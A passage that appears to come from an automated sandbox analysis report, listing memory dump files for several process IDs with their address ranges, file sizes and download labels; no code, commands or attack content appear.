memory/632-33-0x00000000072D0000-0x00000000072EE000-memory.dmp

Filesize
120KB

Download
memory/632-34-0x0000000007300000-0x00000000073A3000-memory.dmp

Filesize
652KB

Download
memory/632-35-0x0000000070840000-0x0000000070FF0000-memory.dmp

Filesize
7.7MB

Download
memory/632-36-0x0000000070840000-0x0000000070FF0000-memory.dmp

Filesize
7.7MB

Download
memory/632-37-0x0000000007CA0000-0x000000000831A000-memory.dmp

Filesize
6.5MB

Download
memory/632-38-0x00000000050B0000-0x00000000050CA000-memory.dmp

Filesize
104KB

Download
memory/632-39-0x00000000076F0000-0x00000000076FA000-memory.dmp

Filesize
40KB

Download
memory/632-40-0x0000000007910000-0x00000000079A6000-memory.dmp

Filesize
600KB

Download
memory/632-41-0x0000000007870000-0x0000000007881000-memory.dmp

Filesize
68KB

Download
memory/632-42-0x00000000078A0000-0x00000000078AE000-memory.dmp

Filesize
56KB

Download
memory/632-43-0x00000000078B0000-0x00000000078C4000-memory.dmp

Filesize
80KB

Download
memory/632-44-0x00000000078F0000-0x000000000790A000-memory.dmp

Filesize
104KB

Download
memory/632-45-0x00000000078E0000-0x00000000078E8000-memory.dmp

Filesize
32KB

Download
memory/632-22-0x0000000070840000-0x0000000070FF0000-memory.dmp

Filesize
7.7MB

Download
memory/632-4-0x0000000005590000-0x0000000005BB8000-memory.dmp

Filesize
6.2MB

Download
memory/632-19-0x0000000006390000-0x00000000063DC000-memory.dmp

Filesize
304KB

Download
memory/632-18-0x00000000062F0000-0x000000000630E000-memory.dmp

Filesize
120KB

Download
memory/632-17-0x0000000005E10000-0x0000000006164000-memory.dmp

Filesize
3.3MB

Download
memory/632-58-0x00000000078E0000-0x00000000078E8000-memory.dmp

Filesize
32KB

Download
memory/632-1-0x000000007084E000-0x000000007084F000-memory.dmp

Filesize
4KB

Download
memory/632-65-0x000000007084E000-0x000000007084F000-memory.dmp

Filesize
4KB

Download
memory/632-66-0x0000000070840000-0x0000000070FF0000-memory.dmp

Filesize
7.7MB

Download
memory/632-2-0x0000000002D20000-0x0000000002D56000-memory.dmp

Filesize
216KB

Download
memory/632-68-0x00000000088D0000-0x0000000008E74000-memory.dmp

Filesize
5.6MB

Download
memory/632-69-0x0000000070840000-0x0000000070FF0000-memory.dmp

Filesize
7.7MB

Download
memory/632-7-0x0000000005CA0000-0x0000000005D06000-memory.dmp

Filesize
408KB

Download
memory/632-75-0x0000000070840000-0x0000000070FF0000-memory.dmp

Filesize
7.7MB

Download
memory/632-6-0x0000000005C30000-0x0000000005C96000-memory.dmp

Filesize
408KB

Download
memory/632-3-0x0000000070840000-0x0000000070FF0000-memory.dmp

Filesize
7.7MB

Download
memory/632-5-0x0000000005340000-0x0000000005362000-memory.dmp

Filesize
136KB

Download
memory/632-21-0x000000006D100000-0x000000006D14C000-memory.dmp

Filesize
304KB

Download
memory/2360-109-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2360-103-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2360-107-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2636-90-0x0000000007710000-0x00000000077AC000-memory.dmp

Filesize
624KB

Download
memory/2636-86-0x0000000005BC0000-0x0000000005F14000-memory.dmp

Filesize
3.3MB

Download
memory/2636-88-0x00000000073C0000-0x00000000073D2000-memory.dmp

Filesize
72KB

Download
memory/2636-89-0x0000000007630000-0x0000000007636000-memory.dmp

Filesize
24KB

Download
memory/3156-119-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3156-116-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3156-99-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-129-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-97-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-128-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-96-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-95-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-127-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-93-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-92-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-126-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-125-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-98-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-120-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/3156-91-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-121-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-122-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-123-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/3156-124-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/4732-110-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4732-104-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4732-102-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4936-64-0x0000000004430000-0x0000000004450000-memory.dmp

Filesize
128KB

Download
memory/4936-0-0x0000000004430000-0x0000000004450000-memory.dmp

Filesize
128KB

Download